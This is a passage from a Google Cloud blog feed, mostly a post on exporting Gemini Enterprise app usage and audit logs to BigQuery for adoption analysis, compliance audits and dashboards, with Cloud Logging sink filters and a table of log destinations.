&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Operational simplicity&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: You get robust bilingual and hybrid search capabilities using standard SQL. This means you can build and scale AI applications using the database skills you already have, without learning new APIs or managing complex external pipelines.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;What's next&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Giving your applications the ability to safely and efficiently interact with transactional data moves us away from fragmented data silos and toward an architecture where AI can reliably access enterprise truth.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Ready to build? Discover AlloyDB with a &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/alloydb/docs/free-trial-cluster"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;30-day free trial&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, and dive into the &lt;/span&gt;&lt;a href="https://codelabs.developers.google.com/next26/alloydb-ai-hybrid-search#0" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Getting started with hybrid search in AlloyDB Codelab&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to start creating intelligent search experiences in your applications today.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/databases/how-alloydb-overcomes-indexing-limitations-with-ai-functions" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-07-15T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/data-analytics/analyze-and-govern-gemini-enterprise-at-scale-with-bigquery</id>
    <title>How to Analyze and Govern Gemini Enterprise App Usage at Scale with BigQuery</title>
    <updated>2026-07-15T16:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p style="text-align: justify;"&gt;&lt;span style="vertical-align: baseline;"&gt;Deploying the &lt;/span&gt;&lt;a href="https://cloud.google.com/gemini-enterprise"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini Enterprise app&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; across an organization marks a transformative leap forward in workforce productivity, providing employees with an amazing, high-performance suite of agentic AI tools, search-grounded assistants, and specialized solutions like NotebookLM. As adoption grows to a large scale, it can introduce a critical administrative scale challenge: how to audit, govern, and extract insights from a massive volume of telemetry without getting bogged down in manual overhead. To help administrators succeed, Google Cloud provides comprehensive, &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/gemini/enterprise/docs/view-analytics"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;out-of-the-box analytics&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; via pre-computed dashboards to track day-to-day adoption, user engagement, and active user metrics. While this provides a product-centric lens to look at Gemini Enterprise app's usage, to understand the impact of agentic AI, administrators might need a more nuanced, organization-centric perspective tailored to their own internal context. This is where using Google BigQuery becomes a crucial tool in the administrator's arsenal to run deep-dive forensics across their organization to analyze and govern the adoption of agentic AI.&lt;/span&gt;&lt;/p&gt;
&lt;h2 style="text-align: justify;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Why Gemini Enterprise app + BigQuery is a game-changer&lt;/strong&gt;&lt;/h2&gt;
&lt;p style="text-align: justify;"&gt;&lt;span style="vertical-align: baseline;"&gt;Augmenting the Gemini Enterprise app with BigQuery through &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/logging/docs/routing/overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;log sinks&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; allows a lean administrative team to analyze and govern a large-scale deployment. Specifically, it empowers IT, Data, and Security teams to:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p style="text-align: justify;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Profile nuanced adoption and behaviors:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Segment usage patterns by department to see which teams are building custom agents, track NotebookLM utilization, and calculate agent-to-employee ratios.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p style="text-align: justify;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Quantify organizational value:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Combine conversational logs with HR or line-of-business datasets to calculate actual employee hours saved, trace value creation, and build executive Looker dashboards.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p style="text-align: justify;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Execute precision compliance audits:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Audit grounding queries across Google Drive folders and enterprise directories to prevent data leaks and protect corporate IP.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p style="text-align: justify;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Investigate safety alerts instantly:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Query historical logs when security filters flag a prompt, identifying the exact text that triggered a &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/gemini/enterprise/docs/enable-model-armor"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Model Armor&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; block to resolve compliance alerts.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p style="text-align: justify;"&gt;&lt;span style="vertical-align: baseline;"&gt;To support these use cases, the telemetry is partitioned into five distinct log tables in BigQuery, capturing unique data fields:&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;
&lt;div align="center"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table style="width: 100%;"&gt;&lt;colgroup&gt;&lt;col style="width: 41.4625%;" /&gt;&lt;col style="width: 58.5375%;" /&gt;&lt;/colgroup&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th scope="col" style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: justify;"&gt;&lt;strong style="vertical-align: baseline;"&gt;BigQuery Destination Table&lt;/strong&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;th scope="col" style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: justify;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Telemetry Captured&lt;/strong&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: justify;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Gen AI User Messages&lt;/strong&gt;&lt;/p&gt;
&lt;p style="text-align: justify;"&gt;&lt;span style="vertical-align: baseline;"&gt;`discoveryengine_googleapis_com_g&lt;br /&gt;en_ai_user_message`&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: justify;"&gt;&lt;span style="vertical-align: baseline;"&gt;Verbatim prompt inputs typed by users&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: justify;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Gen AI Choices&lt;/strong&gt;&lt;/p&gt;
&lt;p style="text-align: justify;"&gt;&lt;span style="vertical-align: baseline;"&gt;`discoveryengine_googleapis_com_g&lt;br /&gt;en_ai_choice`&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: justify;"&gt;&lt;span style="vertical-align: baseline;"&gt;Verbatim model responses, finish reasons, and LLM reasoning steps&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: justify;"&gt;&lt;strong style="vertical-align: baseline;"&gt;User Activity Telemetry&lt;/strong&gt;&lt;/p&gt;
&lt;p style="text-align: justify;"&gt;&lt;span style="vertical-align: baseline;"&gt;`discoveryengine_googleapis_com_g&lt;br /&gt;emini_enterprise_user_activity`&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: justify;"&gt;&lt;span style="vertical-align: baseline;"&gt;Corporate identity (IAM emails) and grounding file access paths&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: justify;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Cloud Audit Activity&lt;/strong&gt;&lt;/p&gt;
&lt;p style="text-align: justify;"&gt;&lt;span style="vertical-align: baseline;"&gt;`cloudaudit_googleapis_com_activity`&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: justify;"&gt;&lt;span style="vertical-align: baseline;"&gt;Control plane configuration changes and administrative user logs&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: justify;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Cloud Audit Data Access&lt;/strong&gt;&lt;/p&gt;
&lt;p style="text-align: justify;"&gt;&lt;span style="vertical-align: baseline;"&gt;`cloudaudit_googleapis_com_data_ac&lt;br /&gt;cess`&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: justify;"&gt;&lt;span style="vertical-align: baseline;"&gt;High-volume data plane interactions and search queries&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: justify;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Aggregate OOB Metrics&lt;/strong&gt;&lt;/p&gt;
&lt;p style="text-align: justify;"&gt;&lt;span style="vertical-align: baseline;"&gt;(Batch Export Table)&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: justify;"&gt;&lt;span style="vertical-align: baseline;"&gt;Pre-aggregated seats claimed, seat purchases, and engagement metrics from the past 30 days. To be pulled asynchronously via custom daily batch runs of the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;analytics:exportMetrics&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; API to build high-level adoption and cost dashboards.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h2 style="text-align: justify;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Ingestion pipeline and architecture&lt;/strong&gt;&lt;/h2&gt;
&lt;p style="text-align: justify;"&gt;&lt;span style="vertical-align: baseline;"&gt;To implement scale-ready observability, administrators establish an automated telemetry pipeline. Moving your Gemini Enterprise data to BigQuery does not require complex custom software development; instead, it leverages a continuous Cloud Logging Log Router Sink for conversational logs and an asynchronous batch export API for high-level aggregate seat metrics.&lt;/span&gt;&lt;/p&gt;
&lt;p style="text-align: justify;"&gt;&lt;span style="vertical-align: baseline;"&gt;The diagram below illustrates the ingestion pipeline and how telemetry is mapped to BigQuery:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="1" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/1_qzsx4jm.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p style="text-align: justify;"&gt;&lt;span style="vertical-align: baseline;"&gt;Here is your blueprint for connecting Gemini Enterprise to BigQuery to build the ultimate analytics and governance foundation for your organization.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Routing pipelines: Continuous logging and audit sinks&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To capture your telemetry, establish log sinks within Cloud Logging to intercept and route runtime events to BigQuery:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;The streaming pipeline (detailed logs):&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Streams row-by-row conversational data (user prompts, model choices, and grounding events). Ensure prompt and response logging is enabled in your Gemini Enterprise Admin Console (see &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/gemini/enterprise/docs/set-up-usage-audit-logs"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Set Up Usage &amp;amp; Audit Logs&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;).&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;Inclusion Filter (replace &lt;/span&gt;&lt;code style="font-style: italic; vertical-align: baseline;"&gt;[PROJECT_ID]&lt;/code&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt; with your Google Cloud Project ID):&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;logName=&amp;quot;projects/[PROJECT_ID]/logs/discoveryengine.googleapis.com%2Fgemini_enterprise_user_activity&amp;quot; OR\r\nlogName=&amp;quot;projects/[PROJECT_ID]/logs/discoveryengine.googleapis.com%2Fgen_ai.user.message&amp;quot; OR\r\nlogName=&amp;quot;projects/[PROJECT_ID]/logs/discoveryengine.googleapis.com%2Fgen_ai.choice&amp;quot;&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f1e0ec80190&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;The governance pipeline (audit logs):&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Captures administrative actions (Admin Activity) and data plane operations (Data Access, such as grounding data connector lookups).&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;Inclusion Filter (replace &lt;/span&gt;&lt;code style="font-style: italic; vertical-align: baseline;"&gt;[PROJECT_ID]&lt;/code&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt; with your Google Cloud Project ID):&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;logName:&amp;quot;projects/[PROJECT_ID]/logs/cloudaudit.googleapis.com&amp;quot; AND \r\nprotoPayload.serviceName=&amp;quot;discoveryengine.googleapis.com&amp;quot;&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f1e0ec802e0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;ul&gt;
&lt;li&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;Admin Activity Logs:&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; Always enabled by default; tracks resource changes (e.g., custom agent creation, updates, deletions).&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;Data Access Logs:&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; Off by default; must be enabled in GCP IAM settings for the &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Discovery Engine API&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; to log user-level data read/write interactions during chats.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h2 style="text-align: justify;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Unlock advanced intelligence in BigQuery&lt;/strong&gt;&lt;/h2&gt;
&lt;h3 style="text-align: justify;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Transform raw telemetry into insights&lt;/strong&gt;&lt;/h3&gt;
&lt;p style="text-align: justify;"&gt;&lt;span style="vertical-align: baseline;"&gt;BigQuery provides AI-powered analysis tools that make understanding and navigating telemetry effortless. By leveraging &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/gemini-overview"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini in BigQuery&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, administrators can translate raw log streams into visual insights and clear documentation without manual guesswork.&lt;/span&gt;&lt;/p&gt;
&lt;p style="text-align: justify;"&gt;&lt;strong style="vertical-align: baseline;"&gt;No-Code Conversational Analytics (BigQuery CA)&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Querying nested JSON schemas is made simple with &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/data-analytics/introducing-conversational-analytics-in-bigquery"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Conversational Analytics in BigQuery&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (BQ CA). BQ CA acts as an intelligent agent within BigQuery Studio, automatically generating and executing SQL grounded in your schema, business metadata, and verified queries/UDFs to ensure metrics consistency. It also surfaces its "thinking process" alongside the generated code to build administrative trust. &lt;/span&gt;&lt;/p&gt;
&lt;p style="text-align: justify;"&gt;&lt;span style="vertical-align: baseline;"&gt;For example, as shown in the screenshot below, asking &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;"Compare the usage of notebooklm, deep research and custom agents using oob_metrics?"&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; generates the correct SQL, runs the query and outputs the result in seconds:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="2" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2_gf21B9L.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;As shown in the screenshot below, BQ CA goes beyond traditional querying and standard SQL generation by allowing users to execute sophisticated AI and machine learning tasks directly within the console. Administrators can leverage these native capabilities to run advanced analysis, such as classification of user prompt sentiment or forecasting future adoption trends, streamlining the governance process.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="3" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/3_EhlARG6.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p style="text-align: justify;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Auto-generated schema documentation and insights&lt;/strong&gt;&lt;/p&gt;
&lt;p style="text-align: justify;"&gt;&lt;span style="vertical-align: baseline;"&gt;Understanding telemetry fields like &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;useriamprincipal&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;finish_reason&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, or &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;groundedContent&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; is crucial for extracting the right insights. BigQuery simplifies this through automated schema documentation and AI-powered context:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Automated profiling and metadata:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; By pairing&lt;/span&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/data-profile-scan"&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Knowledge Catalog Data Profiling&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; with Gemini, you can evaluate unique value counts, null rates, and data distributions in raw tables. With a single click,&lt;/span&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/data-insights"&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Data Insights&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; generates descriptive metadata for both tables and individual nested columns.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Unified data insights:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Gemini leverages this rich context to surface insights across your entire data estate. It automatically recommends queries to find anomalies or safety failures within a single table (like &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;gen_ai_user_message&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;). At the dataset level (&lt;/span&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/generate-dataset-insights"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Preview&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;), it generates an interactive relationship graph to map cross-table join paths and suggests queries that combine data—like user activity and model outputs—to calculate task complexity.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Seamless agent integration and glossaries:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Table and data insights integrate directly into the BigQuery Conversational Analytics (BQ CA) agent UI, giving agents immediate access to enriched metadata and few-shot examples. To ensure agents accurately interpret domain-specific prompts, BQ CA also supports &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;business glossaries&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;. You can define custom terms directly for your agents or import existing glossaries from Knowledge Catalog to establish a standardized vocabulary.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p style="text-align: justify;"&gt;&lt;span style="vertical-align: baseline;"&gt;Administrators can then leverage the profiling, enriched metadata and insights to navigate logged fields, understand the telemetry structure, and catalog data for compliance audits. As shown in the screenshots below, the output of Gemini-powered auto generation of schemas, descriptions and linkages makes it easy to make sense of the complex relationships and telemetry data output by agentic interactions on the Gemini Enterprise app.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="4" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/4_kJTIMt6.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="5" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/5_8OiKqSp.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4 style="text-align: justify;"&gt;&lt;span style="vertical-align: baseline;"&gt;Visualizing with Data Studio dashboards&lt;/span&gt;&lt;/h4&gt;
&lt;p style="text-align: justify;"&gt;&lt;span style="vertical-align: baseline;"&gt;For executive stakeholders, raw log tables can be transformed into interactive, high-impact business intelligence dashboards. By connecting &lt;/span&gt;&lt;a href="https://cloud.google.com/data-studio?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Data Studio&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; directly to BigQuery, you can build dashboards that monitor:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p style="text-align: justify;"&gt;&lt;strong style="vertical-align: baseline;"&gt;User adoption and seat ROI:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Segment usage trends by department, highlighting the ratio of custom agents built relative to employee headcount.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p style="text-align: justify;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Data grounding traffic:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Map which enterprise connectors—such as SharePoint, Google Drive, or Gmail—experience the highest utilization.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p style="text-align: justify;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Content safety and violations:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Track Model Armor sanitization blocks and sentiment feedback loops over time to maintain safety standards.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p style="text-align: justify;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Share BQ Conversational Analytics agent:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Share the BQ CA agents you built via Data Studio to give business users the ability to ask more questions of the data.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
